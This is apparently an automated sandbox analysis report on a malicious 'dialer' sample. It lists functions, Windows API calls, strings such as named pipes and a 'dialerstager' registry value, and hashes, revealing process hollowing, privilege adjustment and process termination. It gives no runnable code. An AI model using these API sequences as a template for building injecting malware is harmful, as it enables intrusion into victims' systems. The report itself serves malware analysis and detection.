WriteFile.KERNEL32 ref: 00007FF67E6C2E07
Sleep.KERNEL32 ref: 00007FF67E6C2E14
DisconnectNamedPipe.KERNELBASE ref: 00007FF67E6C2E1D

Strings

M, xrefs: 00007FF67E6C2DFA
\\.\pipe\dialerchildproc64, xrefs: 00007FF67E6C2D91

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
Instruction ID: 5bbaf159a4a0a81a5fba38c749953d2ce4c2eda030a2817aa468934ac004ef81
Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
Instruction Fuzzy Hash: AB111F23768A4695EA14DB21E4143BA7361EBA4BA4F444334F95E866F4CF7CF54CE700

Function 00007FF67E6C228C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E6C1C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF67E6C1CB3
Part of subcall function 00007FF67E6C1C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF67E6C1D14
Part of subcall function 00007FF67E6C1C64: LocalAlloc.KERNEL32 ref: 00007FF67E6C1D24
Part of subcall function 00007FF67E6C1C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF67E6C1D3A
Part of subcall function 00007FF67E6C1C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF67E6C1D52
Part of subcall function 00007FF67E6C1C64: CreateNamedPipeW.KERNELBASE ref: 00007FF67E6C1D94

Sleep.KERNEL32 ref: 00007FF67E6C22B1
ConnectNamedPipe.KERNELBASE ref: 00007FF67E6C22BE
ReadFile.KERNEL32 ref: 00007FF67E6C22E1
Sleep.KERNEL32 ref: 00007FF67E6C2302
DisconnectNamedPipe.KERNEL32 ref: 00007FF67E6C230B

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF67E6C2299

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
Instruction ID: 14036e5a1928f05883333150c186dcbd9e0985edce3da0c5c37ba84c19921397
Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
Instruction Fuzzy Hash: 66010022B68A4295EE14DB11A8042BB7361AF65BA1F544334EA5E866F4CF7CF44CA700

Function 00007FF67E6C2CC0 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF67E6C2CDB
HeapAlloc.KERNEL32 ref: 00007FF67E6C2CEF
GetProcessHeap.KERNEL32 ref: 00007FF67E6C2CF8
HeapAlloc.KERNEL32 ref: 00007FF67E6C2D06
K32EnumProcesses.KERNEL32 ref: 00007FF67E6C2D21
Sleep.KERNEL32 ref: 00007FF67E6C2D79

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction ID: 1359e05095c05574719e75ba0de514b85a6851bf2c51eb961b8a05d802c02d56
Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction Fuzzy Hash: 9F218773B186128BEB148B16E45457B76A2FB95B80F144138EE4A47B74CE3DF448DB40

Function 00007FF67E6C17F8 Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF67E6C180D
HeapAlloc.KERNEL32 ref: 00007FF67E6C181E

Part of subcall function 00007FF67E6C14E4: GetProcessHeap.KERNEL32 ref: 00007FF67E6C1517
Part of subcall function 00007FF67E6C14E4: HeapAlloc.KERNEL32 ref: 00007FF67E6C152A
Part of subcall function 00007FF67E6C14E4: GetProcessHeap.KERNEL32 ref: 00007FF67E6C1538
Part of subcall function 00007FF67E6C14E4: HeapAlloc.KERNEL32 ref: 00007FF67E6C1549
Part of subcall function 00007FF67E6C14E4: K32EnumProcesses.KERNEL32 ref: 00007FF67E6C1563
Part of subcall function 00007FF67E6C14E4: OpenProcess.KERNEL32 ref: 00007FF67E6C1591
Part of subcall function 00007FF67E6C14E4: K32EnumProcessModules.KERNEL32 ref: 00007FF67E6C15B6
Part of subcall function 00007FF67E6C14E4: ReadProcessMemory.KERNELBASE ref: 00007FF67E6C15ED
Part of subcall function 00007FF67E6C14E4: CloseHandle.KERNELBASE ref: 00007FF67E6C1629
Part of subcall function 00007FF67E6C14E4: GetProcessHeap.KERNEL32 ref: 00007FF67E6C163B
Part of subcall function 00007FF67E6C14E4: HeapFree.KERNEL32 ref: 00007FF67E6C1649
Part of subcall function 00007FF67E6C14E4: GetProcessHeap.KERNEL32 ref: 00007FF67E6C164F
Part of subcall function 00007FF67E6C14E4: HeapFree.KERNEL32 ref: 00007FF67E6C165D

OpenProcess.KERNEL32 ref: 00007FF67E6C1865
TerminateProcess.KERNEL32 ref: 00007FF67E6C1878
CloseHandle.KERNEL32 ref: 00007FF67E6C1881
GetProcessHeap.KERNEL32 ref: 00007FF67E6C1891

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction ID: 8c6f546278c93392f150423caf3574d556322c57e2f2cb42ec94d9713e372596
Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction Fuzzy Hash: 7B11AF62F1D6428AFF189B26A81406A67B1EF99B90F088134EE0D83B65DE3DF4499700

Function 00007FF67E6C19AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19CA
IsWow64Process.KERNEL32(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19E0
CloseHandle.KERNELBASE(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19FB

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction ID: ed255df1b1c2caaaf593b135362571ca4076ba738a6f4abb94fd063d7440164f
Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction Fuzzy Hash: 92F09032B1878287EF148F16B48416A6260FB88BC0F449138FE8E83B68DF3DE448C700

Function 00007FF67E6C2314 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E6C2328: VerSetConditionMask.NTDLL ref: 00007FF67E6C2397
Part of subcall function 00007FF67E6C2328: VerSetConditionMask.NTDLL ref: 00007FF67E6C23A8
Part of subcall function 00007FF67E6C2328: VerSetConditionMask.NTDLL ref: 00007FF67E6C23B9
Part of subcall function 00007FF67E6C2328: VerifyVersionInfoW.KERNEL32 ref: 00007FF67E6C23CC
Part of subcall function 00007FF67E6C2328: GetCurrentProcessId.KERNEL32 ref: 00007FF67E6C23DE
Part of subcall function 00007FF67E6C2328: OpenProcess.KERNEL32 ref: 00007FF67E6C23EE
Part of subcall function 00007FF67E6C2328: OpenProcessToken.ADVAPI32 ref: 00007FF67E6C240F
Part of subcall function 00007FF67E6C2328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF67E6C2429
Part of subcall function 00007FF67E6C2328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF67E6C246D
Part of subcall function 00007FF67E6C2328: GetLastError.KERNEL32 ref: 00007FF67E6C2477
Part of subcall function 00007FF67E6C2328: CloseHandle.KERNELBASE ref: 00007FF67E6C2480
Part of subcall function 00007FF67E6C2328: FindResourceExA.KERNEL32 ref: 00007FF67E6C2494
Part of subcall function 00007FF67E6C2328: SizeofResource.KERNEL32 ref: 00007FF67E6C24AB
Part of subcall function 00007FF67E6C2328: LoadResource.KERNEL32 ref: 00007FF67E6C24C4
Part of subcall function 00007FF67E6C2328: LockResource.KERNEL32 ref: 00007FF67E6C24D6
Part of subcall function 00007FF67E6C2328: GetCurrentProcessId.KERNEL32 ref: 00007FF67E6C24E3

ExitProcess.KERNEL32 ref: 00007FF67E6C231F

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
String ID:
API String ID: 2329183550-0
Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction ID: eca7c803a732fbf75176e2512bccda647ab53a621e4b8996e5bc69f08233df1a
Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction Fuzzy Hash: 1AA02441F34541C5DD043370140D07D11111F70301F400530F40DC5373CD1C300D1310

Non-executed Functions

Function 00007FF67E6C26E8 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 292
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF67E6C276B

Part of subcall function 00007FF67E6C19AC: OpenProcess.KERNEL32(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19CA
Part of subcall function 00007FF67E6C19AC: IsWow64Process.KERNEL32(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19E0
Part of subcall function 00007FF67E6C19AC: CloseHandle.KERNELBASE(?,?,?,00007FF67E6C110E), ref: 00007FF67E6C19FB

Part of subcall function 00007FF67E6C10C0: OpenProcess.KERNEL32 ref: 00007FF67E6C112C
Part of subcall function 00007FF67E6C10C0: OpenProcess.KERNEL32 ref: 00007FF67E6C114B
Part of subcall function 00007FF67E6C10C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF67E6C1170
Part of subcall function 00007FF67E6C10C0: PathFindFileNameW.SHLWAPI ref: 00007FF67E6C117E
Part of subcall function 00007FF67E6C10C0: lstrlenW.KERNEL32 ref: 00007FF67E6C118A
Part of subcall function 00007FF67E6C10C0: StrCpyW.SHLWAPI ref: 00007FF67E6C11A1
Part of subcall function 00007FF67E6C10C0: CloseHandle.KERNEL32 ref: 00007FF67E6C11AD
Part of subcall function 00007FF67E6C10C0: StrCmpIW.SHLWAPI ref: 00007FF67E6C11ED
Part of subcall function 00007FF67E6C10C0: NtQueryInformationProcess.NTDLL ref: 00007FF67E6C1221
Part of subcall function 00007FF67E6C10C0: OpenProcessToken.ADVAPI32 ref: 00007FF67E6C124B

RegOpenKeyExW.ADVAPI32 ref: 00007FF67E6C2807
RegDeleteValueW.ADVAPI32 ref: 00007FF67E6C281F
ExitProcess.KERNEL32 ref: 00007FF67E6C2843
GetProcessHeap.KERNEL32 ref: 00007FF67E6C284A
HeapAlloc.KERNEL32 ref: 00007FF67E6C285D
K32EnumProcesses.KERNEL32 ref: 00007FF67E6C287A
ExitProcess.KERNEL32 ref: 00007FF67E6C291A

Strings

dialerstager, xrefs: 00007FF67E6C2818
open, xrefs: 00007FF67E6C2AEC
SOFTWARE, xrefs: 00007FF67E6C27F9

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction ID: c76d6e40b7de7f3bdddfcb5e7339a834af4fab83b674ce879807612510374630
Opcode Fuzzy Hash: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction Fuzzy Hash: 7CD14263B28A828AEF759F2598042FA2265FF64748F414235F90DC76A5DE3CF64CE740

Function 00007FF67E6C1DB4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF67E6C1E78
VirtualAllocEx.KERNEL32 ref: 00007FF67E6C1EA7
WriteProcessMemory.KERNEL32 ref: 00007FF67E6C1ECC
WriteProcessMemory.KERNEL32 ref: 00007FF67E6C1F08
VirtualAlloc.KERNEL32 ref: 00007FF67E6C1F3B
GetThreadContext.KERNEL32 ref: 00007FF67E6C1F57
WriteProcessMemory.KERNEL32 ref: 00007FF67E6C1F7F
SetThreadContext.KERNEL32 ref: 00007FF67E6C1F9D
ResumeThread.KERNEL32 ref: 00007FF67E6C1FAD
OpenProcess.KERNEL32 ref: 00007FF67E6C1FCC
TerminateProcess.KERNEL32 ref: 00007FF67E6C1FDC

Strings

@, xrefs: 00007FF67E6C1E9F

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction ID: b4a0c75df6f76afa21b1c2a7b27887433045cbeba94d12d14241816e0a59c33a
Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction Fuzzy Hash: C6616A73B14A418AEB508F26E8446AE77A1FB58B88F004235EE4D97B68DF3CE549D740

Function 00007FF67E6C1AC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF67E6C1AEB
SysAllocString.OLEAUT32 ref: 00007FF67E6C1AFB
CoInitializeEx.OLE32 ref: 00007FF67E6C1B08
CoInitializeSecurity.OLE32 ref: 00007FF67E6C1B3F
CoCreateInstance.OLE32 ref: 00007FF67E6C1B84
VariantInit.OLEAUT32 ref: 00007FF67E6C1B96
CoUninitialize.OLE32 ref: 00007FF67E6C1C2F
SysFreeString.OLEAUT32 ref: 00007FF67E6C1C38
SysFreeString.OLEAUT32 ref: 00007FF67E6C1C41

Strings

dialersvc64, xrefs: 00007FF67E6C1AE2

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction ID: d65cf2d342102c497f68dd3b7ba78b11247a76d0107ace583d012d482766b94c
Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction Fuzzy Hash: BE415C33B54B4696EB108F25E8442AE73B5FB98B88B445275EE0E87A24DF3CE149D300

Function 00007FF67E6C1000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF67E6C1034
RegDeleteKeyW.ADVAPI32 ref: 00007FF67E6C1045
RegEnumKeyExW.ADVAPI32 ref: 00007FF67E6C1082
RegCloseKey.ADVAPI32 ref: 00007FF67E6C1093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF67E6C10B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF67E6C1026, 00007FF67E6C109C

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction ID: f691635641d037d585165fa7cef08fb289990937b6ccf14a088202f284218f62
Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction Fuzzy Hash: 15117723B28AC585EB608F24E8447FA2374FB54758F401335E64D8A9A8DF7CE14CDB15

Function 00007FF67E6C2C18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF67E6C2C53
WriteFile.KERNEL32 ref: 00007FF67E6C2C7B
WriteFile.KERNEL32 ref: 00007FF67E6C2C9E
CloseHandle.KERNEL32 ref: 00007FF67E6C2CA7

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF67E6C2C30

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction ID: b4ea94fe3c0344f84c1aeddb68be740745c6b89493476e9c74848a4c9dec2b50
Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction Fuzzy Hash: 2B118277B64B5182EB508B15E40836AA760FB98FE4F444335EA1D43BA4CF7CE509C740

Function 00007FF67E6C1A14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF67E6C1914), ref: 00007FF67E6C1A24
GetProcAddress.KERNEL32(?,?,00000000,00007FF67E6C1914), ref: 00007FF67E6C1A37

Strings

ntdll.dll, xrefs: 00007FF67E6C1A1A

Memory Dump Source

Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true

Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction ID: 0bff8cd4908ec8cb71f68669b57fc212819e6993c9f966bc730b622eab602717
Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction Fuzzy Hash: A8D0A796F75503C5EE084761685907222105F38B44B840170DC1E86720DE2CF09D5200

Analysis Process: powershell.exePID: 8124, Parent PID: 2592COMMON

Executed Functions

Function 00007FFE7DE641FA Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e6e11e0ab373ede0a0f588fe4669a929ecd213f69d9a39c808e2e6464d33a0e
Instruction ID: 6b479cc9ca3f45b26d20ec0625c1f659ecfb5cdb17d64b1dc7836442f023a735
Opcode Fuzzy Hash: 6e6e11e0ab373ede0a0f588fe4669a929ecd213f69d9a39c808e2e6464d33a0e
Instruction Fuzzy Hash: 8421FA31A1895D8FDF99EF58D441EADB7A1FF69300F140166D40AD7296DE24EC82CBC1

Function 00007FFE7DD4EF7C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1407265430.00007FFE7DD4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7dd4d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef4c4e1d3cfa9448e0d426a33a376de2c3c4c01cea62120fab64b9d7be8ab09
Instruction ID: e450a331d686010afe6eb6771795ddc5dca457db62bae3ef2aa4adeaa366e627
Opcode Fuzzy Hash: bef4c4e1d3cfa9448e0d426a33a376de2c3c4c01cea62120fab64b9d7be8ab09
Instruction Fuzzy Hash: CB113A3151CF088F9BA9EF1DE48995277E0FB98320B10065FE559C7666D731E886CBC2

Function 00007FFE7DE64675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79946f02ce72a30f349b55584d04ed382274e5e1e21bcca75a071555e2c24d9b
Instruction ID: e478ab941d87a3314b0bfb083c8b10e5623155f5bb6d347b5e0573886c3db446
Opcode Fuzzy Hash: 79946f02ce72a30f349b55584d04ed382274e5e1e21bcca75a071555e2c24d9b
Instruction Fuzzy Hash: 6701A77111CB0C4FD744EF0CE451AA9B3E0FB85360F10062EE58AC3661D632E881CB41

Function 00007FFE7DF34A0C Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1408921937.00007FFE7DF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7df30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca90d0c8ce9c3cc3a22fbe6c459b932c463cb1aa961a088a0e9d4b2a61517ce0
Instruction ID: 0a606c649f7b16d20e3e6f30712d2f79a3d9822079b06c3cf1132b65d068ad7f
Opcode Fuzzy Hash: ca90d0c8ce9c3cc3a22fbe6c459b932c463cb1aa961a088a0e9d4b2a61517ce0
Instruction Fuzzy Hash: 0A018F3391D5C44FEB79EB18A8454A877E0EF0232071901BBD168DB163E925AC45C749

Function 00007FFE7DE63F2F Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feac9ac8b17957b7279d1a9665479890de40e7682e248c2ea033e6f2efb45b11
Instruction ID: a354b0a3dfa7c306960c92becb63bf76e772f447fbc98311a6ebc8d487f95fb5
Opcode Fuzzy Hash: feac9ac8b17957b7279d1a9665479890de40e7682e248c2ea033e6f2efb45b11
Instruction Fuzzy Hash: 89F0A77270C90D4BA70C661CB8465F873C1CB95360B00417FF44ACA657EC26A88382C5

